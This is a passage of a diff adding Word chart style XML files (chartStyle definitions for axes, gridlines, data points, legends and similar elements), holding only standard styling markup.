+        <a:round/>
+      </a:ln>
+    </cs:spPr>
+  </cs:dataPointLine>
+  <cs:dataPointMarker>
+    <cs:lnRef idx="0">
+      <cs:styleClr val="auto"/>
+    </cs:lnRef>
+    <cs:fillRef idx="0">
+      <cs:styleClr val="auto"/>
+    </cs:fillRef>
+    <cs:effectRef idx="0"/>
+    <cs:fontRef idx="minor">
+      <a:schemeClr val="dk1"/>
+    </cs:fontRef>
+    <cs:spPr>
+      <a:solidFill>
+        <a:schemeClr val="lt1"/>
+      </a:solidFill>
+      <a:ln w="15875">
+        <a:solidFill>
+          <a:schemeClr val="phClr"/>
+        </a:solidFill>
+        <a:round/>
+      </a:ln>
+    </cs:spPr>
+  </cs:dataPointMarker>
+  <cs:dataPointMarkerLayout symbol="circle" size="6"/>
+  <cs:dataPointWireframe>
+    <cs:lnRef idx="0">
+      <cs:styleClr val="auto"/>
+    </cs:lnRef>
+    <cs:fillRef idx="0"/>
+    <cs:effectRef idx="0"/>
+    <cs:fontRef idx="minor">
+      <a:schemeClr val="dk1"/>
+    </cs:fontRef>
+    <cs:spPr>
+      <a:ln w="9525" cap="rnd">
+        <a:solidFill>
+          <a:schemeClr val="phClr"/>
+        </a:solidFill>
+        <a:round/>
+      </a:ln>
+    </cs:spPr>
+  </cs:dataPointWireframe>
+  <cs:dataTable>
+    <cs:lnRef idx="0"/>
+    <cs:fillRef idx="0"/>
+    <cs:effectRef idx="0"/>
+    <cs:fontRef idx="minor">
+      <a:schemeClr val="dk1">
+        <a:lumMod val="65000"/>
+        <a:lumOff val="35000"/>
+      </a:schemeClr>
+    </cs:fontRef>
+    <cs:spPr>
+      <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
+        <a:solidFill>
+          <a:schemeClr val="dk1">
+            <a:lumMod val="15000"/>
+            <a:lumOff val="85000"/>
+          </a:schemeClr>
+        </a:solidFill>
+        <a:round/>
+      </a:ln>
+    </cs:spPr>
+    <cs:defRPr sz="800" kern="1200"/>
+  </cs:dataTable>
+  <cs:downBar>
+    <cs:lnRef idx="0"/>
+    <cs:fillRef idx="0"/>
+    <cs:effectRef idx="0"/>
+    <cs:fontRef idx="minor">
+      <a:schemeClr val="dk1"/>
+    </cs:fontRef>
+    <cs:spPr>
+      <a:solidFill>
+        <a:schemeClr val="dk1">
+          <a:lumMod val="75000"/>
+          <a:lumOff val="25000"/>
+        </a:schemeClr>
+      </a:solidFill>
+      <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
+        <a:solidFill>
+          <a:schemeClr val="dk1">
+            <a:lumMod val="50000"/>
+            <a:lumOff val="50000"/>
+          </a:schemeClr>
+        </a:solidFill>
+        <a:round/>
+      </a:ln>
+    </cs:spPr>
+  </cs:downBar>
+  <cs:dropLine>
+    <cs:lnRef idx="0"/>
+    <cs:fillRef idx="0"/>
+    <cs:effectRef idx="0"/>
+    <cs:fontRef idx="minor">
+      <a:schemeClr val="dk1"/>
+    </cs:fontRef>
+    <cs:spPr>
+      <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
+        <a:solidFill>
+          <a:schemeClr val="dk1">
+            <a:lumMod val="35000"/>
+            <a:lumOff val="65000"/>
+          </a:schemeClr>
+        </a:solidFill>
+        <a:round/>
+      </a:ln>
+    </cs:spPr>
+  </cs:dropLine>
+  <cs:errorBar>
+    <cs:lnRef idx="0"/>
+    <cs:fillRef idx="0"/>
+    <cs:effectRef idx="0"/>
+    <cs:fontRef idx="minor">
+      <a:schemeClr val="dk1"/>
+    </cs:fontRef>
+    <cs:spPr>
+      <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
+        <a:solidFill>
+          <a:schemeClr val="dk1">
+            <a:lumMod val="50000"/>
+            <a:lumOff val="50000"/>
+          </a:schemeClr>
+        </a:solidFill>
+        <a:round/>
+      </a:ln>
+    </cs:spPr>
+  </cs:errorBar>
+  <cs:floor>
+    <cs:lnRef idx="0"/>
+    <cs:fillRef idx="0"/>
+    <cs:effectRef idx="0"/>
+    <cs:fontRef idx="minor">
+      <a:schemeClr val="dk1"/>
+    </cs:fontRef>
+    <cs:spPr>
+      <a:pattFill prst="ltDnDiag">
+        <a:fgClr>
+          <a:schemeClr val="dk1">
+            <a:lumMod val="15000"/>
+            <a:lumOff val="85000"/>
+          </a:schemeClr>
+        </a:fgClr>
+        <a:bgClr>
+          <a:schemeClr val="lt1"/>
+        </a:bgClr>
+      </a:pattFill>
+    </cs:spPr>
+  </cs:floor>
+  <cs:gridlineMajor>
+    <cs:lnRef idx="0"/>
+    <cs:fillRef idx="0"/>
+    <cs:effectRef idx="0"/>
+    <cs:fontRef idx="minor">
+      <a:schemeClr val="dk1"/>
+    </cs:fontRef>
+    <cs:spPr>
+      <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
+        <a:solidFill>
+          <a:schemeClr val="dk1">
+            <a:lumMod val="15000"/>
+            <a:lumOff val="85000"/>
+          </a:schemeClr>
+        </a:solidFill>
+        <a:round/>
+      </a:ln>
+    </cs:spPr>
+  </cs:gridlineMajor>
+  <cs:gridlineMinor>
+    <cs:lnRef idx="0"/>
+    <cs:fillRef idx="0"/>
+    <cs:effectRef idx="0"/>
+    <cs:fontRef idx="minor">
+      <a:schemeClr val="dk1"/>
+    </cs:fontRef>
+    <cs:spPr>
+      <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
+        <a:solidFill>
+          <a:schemeClr val="dk1">
+            <a:lumMod val="5000"/>
+            <a:lumOff val="95000"/>
+          </a:schemeClr>
+        </a:solidFill>
+        <a:round/>
+      </a:ln>
+    </cs:spPr>
+  </cs:gridlineMinor>
+  <cs:hiLoLine>
+    <cs:lnRef idx="0"/>
+    <cs:fillRef idx="0"/>
+    <cs:effectRef idx="0"/>
+    <cs:fontRef idx="minor">
+      <a:schemeClr val="dk1"/>
+    </cs:fontRef>
+    <cs:spPr>
+      <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
+        <a:solidFill>
+          <a:schemeClr val="dk1">
+            <a:lumMod val="35000"/>
+            <a:lumOff val="65000"/>
+          </a:schemeClr>
+        </a:solidFill>
+        <a:round/>
+      </a:ln>
+    </cs:spPr>
+  </cs:hiLoLine>
+  <cs:leaderLine>
+    <cs:lnRef idx="0"/>
+    <cs:fillRef idx="0"/>
+    <cs:effectRef idx="0"/>
+    <cs:fontRef idx="minor">
+      <a:schemeClr val="dk1"/>
+    </cs:fontRef>
+    <cs:spPr>
+      <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
+        <a:solidFill>
+          <a:schemeClr val="dk1">
+            <a:lumMod val="35000"/>
+            <a:lumOff val="65000"/>
+          </a:schemeClr>
+        </a:solidFill>
+        <a:round/>
+      </a:ln>
+    </cs:spPr>
+  </cs:leaderLine>
+  <cs:legend>
+    <cs:lnRef idx="0"/>
+    <cs:fillRef idx="0"/>
+    <cs:effectRef idx="0"/>
+    <cs:fontRef idx="minor">
+      <a:schemeClr val="dk1">
+        <a:lumMod val="65000"/>
+        <a:lumOff val="35000"/>
+      </a:schemeClr>
+    </cs:fontRef>
+    <cs:defRPr sz="900" kern="1200"/>
+  </cs:legend>
+  <cs:plotArea>
+    <cs:lnRef idx="0"/>
+    <cs:fillRef idx="0"/>
+    <cs:effectRef idx="0"/>
+    <cs:fontRef idx="minor">
+      <a:schemeClr val="dk1"/>
+    </cs:fontRef>
+    <cs:spPr>
+      <a:pattFill prst="ltDnDiag">
+        <a:fgClr>
+          <a:schemeClr val="dk1">
+            <a:lumMod val="15000"/>
+            <a:lumOff val="85000"/>
+          </a:schemeClr>
+        </a:fgClr>
+        <a:bgClr>
+          <a:schemeClr val="lt1"/>
+        </a:bgClr>
+      </a:pattFill>
+    </cs:spPr>
+  </cs:plotArea>
+  <cs:plotArea3D>
+    <cs:lnRef idx="0"/>
+    <cs:fillRef idx="0"/>
+    <cs:effectRef idx="0"/>
+    <cs:fontRef idx="minor">
+      <a:schemeClr val="dk1"/>
+    </cs:fontRef>
+    <cs:spPr>
+      <a:solidFill>
+        <a:schemeClr val="lt1"/>
+      </a:solidFill>
+    </cs:spPr>
+  </cs:plotArea3D>
+  <cs:seriesAxis>
+    <cs:lnRef idx="0"/>
+    <cs:fillRef idx="0"/>
+    <cs:effectRef idx="0"/>
+    <cs:fontRef idx="minor">
+      <a:schemeClr val="dk1">
+        <a:lumMod val="65000"/>
+        <a:lumOff val="35000"/>
+      </a:schemeClr>
+    </cs:fontRef>
+    <cs:spPr>
+      <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
+        <a:solidFill>
+          <a:schemeClr val="dk1">
+            <a:lumMod val="15000"/>
+            <a:lumOff val="85000"/>
+          </a:schemeClr>
+        </a:solidFill>
+        <a:round/>
+      </a:ln>
+    </cs:spPr>
+    <cs:defRPr sz="900" kern="1200"/>
+  </cs:seriesAxis>
+  <cs:seriesLine>
+    <cs:lnRef idx="0"/>
+    <cs:fillRef idx="0"/>
+    <cs:effectRef idx="0"/>
+    <cs:fontRef idx="minor">
+      <a:schemeClr val="dk1"/>
+    </cs:fontRef>
+    <cs:spPr>
+      <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
+        <a:solidFill>
+          <a:schemeClr val="dk1">
+            <a:lumMod val="35000"/>
+            <a:lumOff val="65000"/>
+          </a:schemeClr>
+        </a:solidFill>
+        <a:round/>
+      </a:ln>
+    </cs:spPr>
+  </cs:seriesLine>
+  <cs:title>
+    <cs:lnRef idx="0"/>
+    <cs:fillRef idx="0"/>
+    <cs:effectRef idx="0"/>
+    <cs:fontRef idx="major">
+      <a:schemeClr val="dk1">
+        <a:lumMod val="50000"/>
+        <a:lumOff val="50000"/>
+      </a:schemeClr>
+    </cs:fontRef>
+    <cs:defRPr sz="1600" b="1" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0"/>
+  </cs:title>
+  <cs:trendline>
+    <cs:lnRef idx="0">
+      <cs:styleClr val="auto"/>
+    </cs:lnRef>
+    <cs:fillRef idx="0"/>
+    <cs:effectRef idx="0"/>
+    <cs:fontRef idx="minor">
+      <a:schemeClr val="dk1"/>
+    </cs:fontRef>
+    <cs:spPr>
+      <a:ln w="19050" cap="rnd">
+        <a:solidFill>
+          <a:schemeClr val="phClr"/>
+        </a:solidFill>
+      </a:ln>
+    </cs:spPr>
+  </cs:trendline>
+  <cs:trendlineLabel>
+    <cs:lnRef idx="0"/>
+    <cs:fillRef idx="0"/>
+    <cs:effectRef idx="0"/>
+    <cs:fontRef idx="minor">
+      <a:schemeClr val="dk1">
+        <a:lumMod val="65000"/>
+        <a:lumOff val="35000"/>
+      </a:schemeClr>
+    </cs:fontRef>
+    <cs:defRPr sz="900" kern="1200"/>
+  </cs:trendlineLabel>
+  <cs:upBar>
+    <cs:lnRef idx="0"/>
+    <cs:fillRef idx="0"/>
+    <cs:effectRef idx="0"/>
+    <cs:fontRef idx="minor">
+      <a:schemeClr val="dk1"/>
+    </cs:fontRef>
+    <cs:spPr>
+      <a:solidFill>
+        <a:schemeClr val="lt1"/>
+      </a:solidFill>
+      <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
+        <a:solidFill>
+          <a:schemeClr val="dk1">
+            <a:lumMod val="50000"/>
+            <a:lumOff val="50000"/>
+          </a:schemeClr>
+        </a:solidFill>
+        <a:round/>
+      </a:ln>
+    </cs:spPr>
+  </cs:upBar>
+  <cs:valueAxis>
+    <cs:lnRef idx="0"/>
+    <cs:fillRef idx="0"/>
+    <cs:effectRef idx="0"/>
+    <cs:fontRef idx="minor">
+      <a:schemeClr val="dk1">
+        <a:lumMod val="65000"/>
+        <a:lumOff val="35000"/>
+      </a:schemeClr>
+    </cs:fontRef>
+    <cs:spPr>
+      <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
+        <a:solidFill>
+          <a:schemeClr val="dk1">
+            <a:lumMod val="15000"/>
+            <a:lumOff val="85000"/>
+          </a:schemeClr>
+        </a:solidFill>
+        <a:round/>
+      </a:ln>
+    </cs:spPr>
+    <cs:defRPr sz="900" kern="1200"/>
+  </cs:valueAxis>
+  <cs:wall>
+    <cs:lnRef idx="0"/>
+    <cs:fillRef idx="0"/>
+    <cs:effectRef idx="0"/>
+    <cs:fontRef idx="minor">
+      <a:schemeClr val="dk1"/>
+    </cs:fontRef>
+    <cs:spPr>
+      <a:pattFill prst="ltDnDiag">
+        <a:fgClr>
+          <a:schemeClr val="dk1">
+            <a:lumMod val="15000"/>
+            <a:lumOff val="85000"/>
+          </a:schemeClr>
+        </a:fgClr>
+        <a:bgClr>
+          <a:schemeClr val="lt1"/>
+        </a:bgClr>
+      </a:pattFill>
+    </cs:spPr>
+  </cs:wall>
+</cs:chartStyle>
+</file>
+
+<file path=word/charts/style2.xml><?xml version="1.0" encoding="utf-8"?>
+<cs:chartStyle xmlns:cs="http://schemas.microsoft.com/office/drawing/2012/chartStyle" xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" id="303">
+  <cs:axisTitle>
+    <cs:lnRef idx="0"/>
+    <cs:fillRef idx="0"/>
+    <cs:effectRef idx="0"/>
+    <cs:fontRef idx="minor">
+      <a:schemeClr val="dk1">
+        <a:lumMod val="65000"/>
+        <a:lumOff val="35000"/>
+      </a:schemeClr>
+    </cs:fontRef>
+    <cs:defRPr sz="900" b="1" kern="1200"/>
+  </cs:axisTitle>
+  <cs:categoryAxis>
+    <cs:lnRef idx="0"/>
+    <cs:fillRef idx="0"/>
+    <cs:effectRef idx="0"/>
+    <cs:fontRef idx="minor">
+      <a:schemeClr val="dk1">
+        <a:lumMod val="65000"/>
+        <a:lumOff val="35000"/>
+      </a:schemeClr>
+    </cs:fontRef>
+    <cs:spPr>
+      <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
+        <a:solidFill>
+          <a:schemeClr val="dk1">
+            <a:lumMod val="15000"/>
+            <a:lumOff val="85000"/>
+          </a:schemeClr>
+        </a:solidFill>
+        <a:round/>
+      </a:ln>
+    </cs:spPr>
+    <cs:defRPr sz="900" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0"/>
+  </cs:categoryAxis>
+  <cs:chartArea>
+    <cs:lnRef idx="0"/>
+    <cs:fillRef idx="0"/>
+    <cs:effectRef idx="0"/>
+    <cs:fontRef idx="minor">
+      <a:schemeClr val="dk1"/>
+    </cs:fontRef>
+    <cs:spPr>
+      <a:solidFill>
+        <a:schemeClr val="lt1"/>
+      </a:solidFill>
+      <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
+        <a:solidFill>
+          <a:schemeClr val="dk1">
+            <a:lumMod val="15000"/>
+            <a:lumOff val="85000"/>
+          </a:schemeClr>
+        </a:solidFill>
+        <a:round/>
+      </a:ln>
+    </cs:spPr>
+    <cs:defRPr sz="900" kern="1200"/>
+  </cs:chartArea>
+  <cs:dataLabel>
+    <cs:lnRef idx="0"/>
+    <cs:fillRef idx="0"/>
+    <cs:effectRef idx="0"/>
+    <cs:fontRef idx="minor">
+      <a:schemeClr val="dk1">
+        <a:lumMod val="75000"/>
+        <a:lumOff val="25000"/>
+      </a:schemeClr>
+    </cs:fontRef>
+    <cs:defRPr sz="900" kern="1200"/>
+  </cs:dataLabel>
+  <cs:dataLabelCallout>
+    <cs:lnRef idx="0"/>
+    <cs:fillRef idx="0"/>
+    <cs:effectRef idx="0"/>
+    <cs:fontRef idx="minor">
+      <a:schemeClr val="dk1">
+        <a:lumMod val="65000"/>
+        <a:lumOff val="35000"/>
+      </a:schemeClr>
+    </cs:fontRef>
+    <cs:spPr>
+      <a:solidFill>
+        <a:schemeClr val="lt1"/>
+      </a:solidFill>
+      <a:ln>
+        <a:solidFill>
+          <a:schemeClr val="dk1">
+            <a:lumMod val="25000"/>
+            <a:lumOff val="75000"/>
+          </a:schemeClr>
+        </a:solidFill>
+      </a:ln>
+    </cs:spPr>
+    <cs:defRPr sz="900" kern="1200"/>
+    <cs:bodyPr rot="0" spcFirstLastPara="1" vertOverflow="clip" horzOverflow="clip" vert="horz" wrap="square" lIns="36576" tIns="18288" rIns="36576" bIns="18288" anchor="ctr" anchorCtr="1">
+      <a:spAutoFit/>
+    </cs:bodyPr>
+  </cs:dataLabelCallout>
+  <cs:dataPoint>
+    <cs:lnRef idx="0"/>
+    <cs:fillRef idx="0">
+      <cs:styleClr val="auto"/>
+    </cs:fillRef>
+    <cs:effectRef idx="0"/>
+    <cs:fontRef idx="minor">
+      <a:schemeClr val="dk1"/>
+    </cs:fontRef>
+    <cs:spPr>
+      <a:solidFill>
+        <a:schemeClr val="phClr"/>
+      </a:solidFill>
+    </cs:spPr>
+  </cs:dataPoint>
+  <cs:dataPoint3D>
+    <cs:lnRef idx="0"/>
+    <cs:fillRef idx="0">
+      <cs:styleClr val="auto"/>
+    </cs:fillRef>
+    <cs:effectRef idx="0"/>
+    <cs:fontRef idx="minor">
+      <a:schemeClr val="dk1"/>
+    </cs:fontRef>
+    <cs:spPr>
+      <a:solidFill>
+        <a:schemeClr val="phClr"/>
+      </a:solidFill>
+    </cs:spPr>
+  </cs:dataPoint3D>
+  <cs:dataPointLine>
+    <cs:lnRef idx="0">
+      <cs:styleClr val="auto"/>
+    </cs:lnRef>
+    <cs:fillRef idx="0"/>
+    <cs:effectRef idx="0"/>
+    <cs:fontRef idx="minor">
+      <a:schemeClr val="dk1"/>
+    </cs:fontRef>
+    <cs:spPr>
+      <a:ln w="22225" cap="rnd">
+        <a:solidFill>
+          <a:schemeClr val="phClr"/>
+        </a:solidFill>
+        <a:round/>
+      </a:ln>
+    </cs:spPr>
+  </cs:dataPointLine>
+  <cs:dataPointMarker>
+    <cs:lnRef idx="0">
+      <cs:styleClr val="auto"/>
+    </cs:lnRef>
+    <cs:fillRef idx="0">
+      <cs:styleClr val="auto"/>
+    </cs:fillRef>
+    <cs:effectRef idx="0"/>
+    <cs:fontRef idx="minor">
+      <a:schemeClr val="dk1"/>
+    </cs:fontRef>
+    <cs:spPr>
+      <a:solidFill>
+        <a:schemeClr val="lt1"/>
+      </a:solidFill>
+      <a:ln w="15875">
+        <a:solidFill>
+          <a:schemeClr val="phClr"/>
+        </a:solidFill>
+        <a:round/>
+      </a:ln>
+    </cs:spPr>
+  </cs:dataPointMarker>
+  <cs:dataPointMarkerLayout symbol="circle" size="6"/>
+  <cs:dataPointWireframe>
+    <cs:lnRef idx="0">
+      <cs:styleClr val="auto"/>
+    </cs:lnRef>
+    <cs:fillRef idx="0"/>
+    <cs:effectRef idx="0"/>
+    <cs:fontRef idx="minor">
+      <a:schemeClr val="dk1"/>
+    </cs:fontRef>
+    <cs:spPr>
+      <a:ln w="9525" cap="rnd">
+        <a:solidFill>
+          <a:schemeClr val="phClr"/>
+        </a:solidFill>
+        <a:round/>
+      </a:ln>
+    </cs:spPr>
+  </cs:dataPointWireframe>
+  <cs:dataTable>
+    <cs:lnRef idx="0"/>
+    <cs:fillRef idx="0"/>
+    <cs:effectRef idx="0"/>
+    <cs:fontRef idx="minor">
+      <a:schemeClr val="dk1">
+        <a:lumMod val="65000"/>
+        <a:lumOff val="35000"/>
+      </a:schemeClr>
+    </cs:fontRef>
+    <cs:spPr>
+      <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
+        <a:solidFill>
+          <a:schemeClr val="dk1">
+            <a:lumMod val="15000"/>
+            <a:lumOff val="85000"/>
+          </a:schemeClr>
+        </a:solidFill>
+        <a:round/>
+      </a:ln>
+    </cs:spPr>
+    <cs:defRPr sz="800" kern="1200"/>
+  </cs:dataTable>
+  <cs:downBar>
+    <cs:lnRef idx="0"/>
+    <cs:fillRef idx="0"/>
+    <cs:effectRef idx="0"/>
+    <cs:fontRef idx="minor">
+      <a:schemeClr val="dk1"/>
+    </cs:fontRef>
+    <cs:spPr>
+      <a:solidFill>
+        <a:schemeClr val="dk1">
+          <a:lumMod val="75000"/>
+          <a:lumOff val="25000"/>
+        </a:schemeClr>
+      </a:solidFill>
+      <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
+        <a:solidFill>
+          <a:schemeClr val="dk1">
+            <a:lumMod val="50000"/>
+            <a:lumOff val="50000"/>
+          </a:schemeClr>
+        </a:solidFill>
+        <a:round/>
+      </a:ln>
+    </cs:spPr>
+  </cs:downBar>
+  <cs:dropLine>
+    <cs:lnRef idx="0"/>
+    <cs:fillRef idx="0"/>
+    <cs:effectRef idx="0"/>
+    <cs:fontRef idx="minor">
+      <a:schemeClr val="dk1"/>
+    </cs:fontRef>
+    <cs:spPr>
+      <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
+        <a:solidFill>
+          <a:schemeClr val="dk1">
+            <a:lumMod val="35000"/>
+            <a:lumOff val="65000"/>
+          </a:schemeClr>
+        </a:solidFill>
+        <a:round/>
+      </a:ln>
+    </cs:spPr>
+  </cs:dropLine>
+  <cs:errorBar>
+    <cs:lnRef idx="0"/>
+    <cs:fillRef idx="0"/>
+    <cs:effectRef idx="0"/>
+    <cs:fontRef idx="minor">
+      <a:schemeClr val="dk1"/>
+    </cs:fontRef>
+    <cs:spPr>
+      <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
+        <a:solidFill>
+          <a:schemeClr val="dk1">
+            <a:lumMod val="50000"/>
+            <a:lumOff val="50000"/>
+          </a:schemeClr>
+        </a:solidFill>
+        <a:round/>
+      </a:ln>
+    </cs:spPr>
+  </cs:errorBar>
+  <cs:floor>
+    <cs:lnRef idx="0"/>
+    <cs:fillRef idx="0"/>
+    <cs:effectRef idx="0"/>
+    <cs:fontRef idx="minor">
+      <a:schemeClr val="dk1"/>
+    </cs:fontRef>
+    <cs:spPr>
+      <a:pattFill prst="ltDnDiag">
+        <a:fgClr>
+          <a:schemeClr val="dk1">
+            <a:lumMod val="15000"/>
+            <a:lumOff val="85000"/>
+          </a:schemeClr>
+        </a:fgClr>
+        <a:bgClr>
+          <a:schemeClr val="lt1"/>
+        </a:bgClr>
+      </a:pattFill>
+    </cs:spPr>
+  </cs:floor>
+  <cs:gridlineMajor>
+    <cs:lnRef idx="0"/>
+    <cs:fillRef idx="0"/>
+    <cs:effectRef idx="0"/>
+    <cs:fontRef idx="minor">
+      <a:schemeClr val="dk1"/>
+    </cs:fontRef>
+    <cs:spPr>
+      <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
+        <a:solidFill>
+          <a:schemeClr val="dk1">
+            <a:lumMod val="15000"/>
+            <a:lumOff val="85000"/>
+          </a:schemeClr>
+        </a:solidFill>
+        <a:round/>
+      </a:ln>
+    </cs:spPr>
+  </cs:gridlineMajor>
+  <cs:gridlineMinor>
+    <cs:lnRef idx="0"/>
+    <cs:fillRef idx="0"/>
+    <cs:effectRef idx="0"/>
+    <cs:fontRef idx="minor">
+      <a:schemeClr val="dk1"/>
+    </cs:fontRef>
+    <cs:spPr>
+      <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
+        <a:solidFill>
+          <a:schemeClr val="dk1">
+            <a:lumMod val="5000"/>
+            <a:lumOff val="95000"/>
+          </a:schemeClr>
+        </a:solidFill>
+        <a:round/>
+      </a:ln>
+    </cs:spPr>
+  </cs:gridlineMinor>
+  <cs:hiLoLine>
+    <cs:lnRef idx="0"/>
+    <cs:fillRef idx="0"/>
+    <cs:effectRef idx="0"/>
+    <cs:fontRef idx="minor">
+      <a:schemeClr val="dk1"/>
+    </cs:fontRef>
+    <cs:spPr>
+      <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
+        <a:solidFill>
+          <a:schemeClr val="dk1">
+            <a:lumMod val="35000"/>
+            <a:lumOff val="65000"/>
+          </a:schemeClr>
+        </a:solidFill>
+        <a:round/>
+      </a:ln>
+    </cs:spPr>
+  </cs:hiLoLine>
+  <cs:leaderLine>
+    <cs:lnRef idx="0"/>
+    <cs:fillRef idx="0"/>
+    <cs:effectRef idx="0"/>
+    <cs:fontRef idx="minor">
+      <a:schemeClr val="dk1"/>
+    </cs:fontRef>
+    <cs:spPr>
+      <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
+        <a:solidFill>
+          <a:schemeClr val="dk1">
+            <a:lumMod val="35000"/>
+            <a:lumOff val="65000"/>
+          </a:schemeClr>
+        </a:solidFill>
+        <a:round/>
+      </a:ln>
+    </cs:spPr>
+  </cs:leaderLine>
+  <cs:legend>
+    <cs:lnRef idx="0"/>
+    <cs:fillRef idx="0"/>
+    <cs:effectRef idx="0"/>
+    <cs:fontRef idx="minor">
+      <a:schemeClr val="dk1">
+        <a:lumMod val="65000"/>
+        <a:lumOff val="35000"/>
+      </a:schemeClr>
+    </cs:fontRef>
+    <cs:defRPr sz="900" kern="1200"/>
+  </cs:legend>
+  <cs:plotArea>
+    <cs:lnRef idx="0"/>
+    <cs:fillRef idx="0"/>
+    <cs:effectRef idx="0"/>
+    <cs:fontRef idx="minor">
+      <a:schemeClr val="dk1"/>
+    </cs:fontRef>
+    <cs:spPr>
+      <a:pattFill prst="ltDnDiag">
+        <a:fgClr>
+          <a:schemeClr val="dk1">
+            <a:lumMod val="15000"/>
+            <a:lumOff val="85000"/>
+          </a:schemeClr>
+        </a:fgClr>
+        <a:bgClr>
+          <a:schemeClr val="lt1"/>
+        </a:bgClr>
+      </a:pattFill>
+    </cs:spPr>
+  </cs:plotArea>
+  <cs:plotArea3D>
+    <cs:lnRef idx="0"/>
+    <cs:fillRef idx="0"/>
+    <cs:effectRef idx="0"/>
+    <cs:fontRef idx="minor">
+      <a:schemeClr val="dk1"/>
+    </cs:fontRef>
+    <cs:spPr>
+      <a:solidFill>
+        <a:schemeClr val="lt1"/>
+      </a:solidFill>
+    </cs:spPr>
+  </cs:plotArea3D>
+  <cs:seriesAxis>
+    <cs:lnRef idx="0"/>
+    <cs:fillRef idx="0"/>
+    <cs:effectRef idx="0"/>
+    <cs:fontRef idx="minor">
+      <a:schemeClr val="dk1">
+        <a:lumMod val="65000"/>
+        <a:lumOff val="35000"/>
+      </a:schemeClr>
+    </cs:fontRef>
+    <cs:spPr>
+      <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
+        <a:solidFill>
+          <a:schemeClr val="dk1">
+            <a:lumMod val="15000"/>
+            <a:lumOff val="85000"/>
+          </a:schemeClr>
+        </a:solidFill>
+        <a:round/>
+      </a:ln>
+    </cs:spPr>
+    <cs:defRPr sz="900" kern="1200"/>
+  </cs:seriesAxis>
+  <cs:seriesLine>
+    <cs:lnRef idx="0"/>
+    <cs:fillRef idx="0"/>
+    <cs:effectRef idx="0"/>
+    <cs:fontRef idx="minor">
+      <a:schemeClr val="dk1"/>
+    </cs:fontRef>
+    <cs:spPr>
+      <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
+        <a:solidFill>
+          <a:schemeClr val="dk1">
+            <a:lumMod val="35000"/>
+            <a:lumOff val="65000"/>
+          </a:schemeClr>
+        </a:solidFill>
+        <a:round/>
+      </a:ln>
+    </cs:spPr>
+  </cs:seriesLine>
+  <cs:title>
+    <cs:lnRef idx="0"/>
+    <cs:fillRef idx="0"/>
+    <cs:effectRef idx="0"/>
+    <cs:fontRef idx="major">
+      <a:schemeClr val="dk1">
+        <a:lumMod val="50000"/>
+        <a:lumOff val="50000"/>
+      </a:schemeClr>
+    </cs:fontRef>
+    <cs:defRPr sz="1600" b="1" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0"/>
+  </cs:title>
+  <cs:trendline>
+    <cs:lnRef idx="0">
+      <cs:styleClr val="auto"/>
+    </cs:lnRef>
+    <cs:fillRef idx="0"/>
+    <cs:effectRef idx="0"/>
+    <cs:fontRef idx="minor">
+      <a:schemeClr val="dk1"/>
+    </cs:fontRef>
+    <cs:spPr>
+      <a:ln w="19050" cap="rnd">
+        <a:solidFill>
+          <a:schemeClr val="phClr"/>
+        </a:solidFill>
+      </a:ln>
+    </cs:spPr>
+  </cs:trendline>
+  <cs:trendlineLabel>
+    <cs:lnRef idx="0"/>
+    <cs:fillRef idx="0"/>
+    <cs:effectRef idx="0"/>
+    <cs:fontRef idx="minor">
+      <a:schemeClr val="dk1">
+        <a:lumMod val="65000"/>
+        <a:lumOff val="35000"/>
+      </a:schemeClr>
+    </cs:fontRef>
+    <cs:defRPr sz="900" kern="1200"/>
+  </cs:trendlineLabel>
+  <cs:upBar>
+    <cs:lnRef idx="0"/>
+    <cs:fillRef idx="0"/>
+    <cs:effectRef idx="0"/>
+    <cs:fontRef idx="minor">
+      <a:schemeClr val="dk1"/>
+    </cs:fontRef>
+    <cs:spPr>
+      <a:solidFill>
+        <a:schemeClr val="lt1"/>
+      </a:solidFill>
+      <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
+        <a:solidFill>
+          <a:schemeClr val="dk1">
+            <a:lumMod val="50000"/>
+            <a:lumOff val="50000"/>
+          </a:schemeClr>
+        </a:solidFill>
+        <a:round/>
+      </a:ln>
+    </cs:spPr>
+  </cs:upBar>
+  <cs:valueAxis>
+    <cs:lnRef idx="0"/>
+    <cs:fillRef idx="0"/>
+    <cs:effectRef idx="0"/>
+    <cs:fontRef idx="minor">
+      <a:schemeClr val="dk1">
+        <a:lumMod val="65000"/>
+        <a:lumOff val="35000"/>
+      </a:schemeClr>
+    </cs:fontRef>
+    <cs:spPr>
+      <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
+        <a:solidFill>
+          <a:schemeClr val="dk1">
+            <a:lumMod val="15000"/>
+            <a:lumOff val="85000"/>
+          </a:schemeClr>
+        </a:solidFill>
+        <a:round/>
+      </a:ln>
+    </cs:spPr>
+    <cs:defRPr sz="900" kern="1200"/>
+  </cs:valueAxis>
+  <cs:wall>
+    <cs:lnRef idx="0"/>
+    <cs:fillRef idx="0"/>
+    <cs:effectRef idx="0"/>
+    <cs:fontRef idx="minor">
+      <a:schemeClr val="dk1"/>
